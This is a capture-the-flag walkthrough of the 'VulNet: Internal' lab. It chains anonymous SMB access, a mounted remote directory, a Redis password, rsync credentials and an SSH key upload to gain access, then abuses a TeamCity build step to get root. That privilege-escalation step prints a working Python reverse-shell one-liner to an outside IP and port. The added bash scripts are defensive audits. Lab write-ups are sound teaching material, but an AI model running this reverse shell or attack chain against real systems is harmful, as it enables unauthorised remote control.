VulNet: Internal


Last updated 3 years ago

Scanning

Let's run an nmap scan to find the open ports and the services running on them.

Enumeration

Let's check port 9090, which is running SMB.

Let's first look at what shares are on the system.

The Shares disk is interesting, so let's try to access it as an anonymous user.

We were able to access it. Let's cd into these directories and transfer all the files onto our machine.

Let's read the services.txt file.

Looks like we have the first flag.

Let's read the other files.

There is nothing interesting there, so let's look at the other services running on the machine, starting with the RPC service running on port 111.

Looks like we have a directory, so let's mount it onto our machine. First we create a directory called mount and then use the mount command to mount the directory.

Let's look for interesting files in the directory. There is an interesting file in the redis directory.

This is a configuration file, and there is a lot of output when we cat it, so let's search for "pass" strings to get some information about the passwords.

Now that we have the password, let's try to access redis and look for the second flag.

We have the second flag. Now let's look at the auth key. We cannot GET the key, so let's look at its key type.

Now that we know it is a list key type, let's read it.

We have a base64 string, so let's decode it.

Looks like we have the credentials for the rsync service running on the system. Let's look at it in more detail and see what interesting files we can find.
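The chain above starts with a directory that could be mounted remotely and a Redis configuration file inside it that held a live password. As an added example (not part of the original writeup), this audit flags both conditions, assuming the directory was an NFS export; the exports file, paths and password value are constructed, and masterauth is checked in addition to requirepass.

```shell
#!/usr/bin/env bash
# Added example: flag NFS exports offered to any host and the Redis config
# files with an active password directive inside them.

# audit_exports EXPORTS_FILE
#   OPEN <path>    export whose client spec is "*" (any host may mount it)
#   SECRET <file>  file under that path with an active requirepass/masterauth
audit_exports() {
    local exports_file=$1 path clients
    while read -r path clients; do
        case $path in ''|'#'*) continue ;; esac   # blank line or comment
        case " $clients" in
            *' *('*|*' *') ;;                     # "*(opts)" or a bare "*"
            *) continue ;;                        # restricted to host/subnet
        esac
        echo "OPEN $path"
        # Anchored at line start, so commented-out samples are not reported.
        # Only file names are printed, never the password itself.
        grep -rIlE '^[[:space:]]*(requirepass|masterauth)[[:space:]]+[^[:space:]]' \
            "$path" 2>/dev/null | sed 's/^/SECRET /'
    done < "$exports_file"
    return 0
}

# Constructed sample data: two export roots and one exports file.
make_sample() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/conf/redis" "$root/backup"
    printf '# requirepass foobared\nrequirepass "CONSTRUCTED-PLACEHOLDER"\n' \
        > "$root/conf/redis/redis.conf"
    printf 'requirepass "CONSTRUCTED-PLACEHOLDER"\n' > "$root/backup/redis.conf"
    {
        echo "# constructed exports file"
        echo "$root/conf *(ro,sync,no_subtree_check)"
        echo "$root/backup 192.0.2.10(rw,sync)"
    } > "$root/exports"
    echo "$root"
}

sample_root=$(make_sample)
audit_exports "$sample_root/exports"
rm -rf "$sample_root"
```

On a real server the argument would be /etc/exports; the second export in the sample is skipped because it is limited to one client address.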

Exploitation

Now we can either get the files onto our machine or upload our SSH key and then log in to the machine over SSH.

First we have to create our SSH key and then upload it to the machine.

Now we can log in.

Let's read the user flag.
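A key uploaded through a writable rsync module, as described above, shows up as an authorized_keys entry nobody approved. As an added example (not part of the original writeup), this check compares a user's authorized_keys against an approved list of key blobs; the file layout, the approved-list format and the key blobs are constructed assumptions.

```shell
#!/usr/bin/env bash
# Added example: report authorized_keys entries whose key blob is not on an
# approved list.

# unexpected_keys AUTHORIZED_KEYS APPROVED
# APPROVED holds one approved key blob (the base64 field) per line.
# Prints "<line-number> <key-type> <comment>" for every unapproved entry.
unexpected_keys() {
    awk '
        FILENAME == ARGV[1] { if (NF) ok[$1] = 1; next }  # approved blobs
        NF == 0 || $1 ~ /^#/ { next }                     # blank or comment
        {
            # Skip leading options such as from="..." to reach the key type.
            for (i = 1; i < NF; i++)
                if ($i ~ /^(ssh-|ecdsa-sha2-|sk-)/) break
            if (i >= NF) { print FNR, "unparsed", "-"; next }
            if (!($(i + 1) in ok))
                print FNR, $i, (i + 2 <= NF ? $(i + 2) : "-")
        }
    ' "$2" "$1"
}

# Constructed sample: one approved entry and one unknown entry.
make_keys_sample() {
    local d
    d=$(mktemp -d)
    # Constructed blobs, not real keys.
    printf '%s\n' 'AAAAC3ConstructedApprovedBlob' > "$d/approved"
    {
        echo '# constructed authorized_keys'
        echo 'ssh-ed25519 AAAAC3ConstructedApprovedBlob admin@bastion'
        echo 'from="192.0.2.0/24" ssh-rsa AAAAB3ConstructedUnknownBlob unknown@host'
    } > "$d/authorized_keys"
    echo "$d"
}

keys_dir=$(make_keys_sample)
unexpected_keys "$keys_dir/authorized_keys" "$keys_dir/approved"
rm -rf "$keys_dir"
```

Run from a scheduled job, any output line is a change to investigate; an empty approved list reports every entry rather than none.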

Privilege Escalation

Looking around, there is an interesting directory.

Let's look at this directory and read the readme file.

Let's look at the ports open on the machine.

Something is running on port 8111. Let's set up port forwarding so that we can see what is running on this port.

Now let's go to localhost:8111 in the browser.

We have a TeamCity login page. Clicking on the Super User option, we see that we need an authentication token to log in, so let's look for this on the machine.

grep -r "authentication token" 2>/dev/null

We have tokens; let's use one of them to log in. (None of them work except the last one.)

We are logged in.

Let's try to create a new project.

Let's create a new Build Configuration.

Now let's go to the homepage and click on the project name.

Let's go to Edit Configuration Settings, then go to Build Steps and select Python.

Let's add a reverse shell in the Custom Script command option:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.8.64",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Let's now start a netcat listener on our machine.

Let's save the build step and run it by clicking Run.

We have a shell as root, so let's read the root flag.
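The super user login above worked because the grep for "authentication token" found the tokens in files an unprivileged account could read. As an added example (not part of the original writeup), this check lists files under a directory that are readable by every local user and contain that phrase; the directory layout, file names and log lines are constructed.

```shell
#!/usr/bin/env bash
# Added example: find files readable by "other" that contain the phrase the
# writeup greps for. Token values are never printed, only a per-file count.

# exposed_token_logs DIR
# Prints "<file> <matching-line-count>" for each exposed file under DIR.
exposed_token_logs() {
    find "$1" -type f -perm -004 \
        -exec grep -IcH 'authentication token' {} + 2>/dev/null |
        awk -F: '$NF > 0 { n = $NF; sub(/:[0-9]+$/, ""); print $0, n }'
}

# Constructed sample: one world-readable log, one restricted log, one log
# without tokens. Token values are placeholders.
make_log_sample() {
    local d
    d=$(mktemp -d)
    printf '%s\n' \
        '[constructed] Super user authentication token: PLACEHOLDER-1' \
        '[constructed] Super user authentication token: PLACEHOLDER-2' \
        > "$d/world-readable.log"
    printf '%s\n' \
        '[constructed] Super user authentication token: PLACEHOLDER-3' \
        > "$d/restricted.log"
    printf '%s\n' '[constructed] server started' > "$d/other.log"
    chmod 644 "$d/world-readable.log" "$d/other.log"
    chmod 640 "$d/restricted.log"
    echo "$d"
}

log_dir=$(make_log_sample)
exposed_token_logs "$log_dir"
rm -rf "$log_dir"
```

Each reported file is a candidate for tighter permissions (for example removing read access for "other") on the service's log directory.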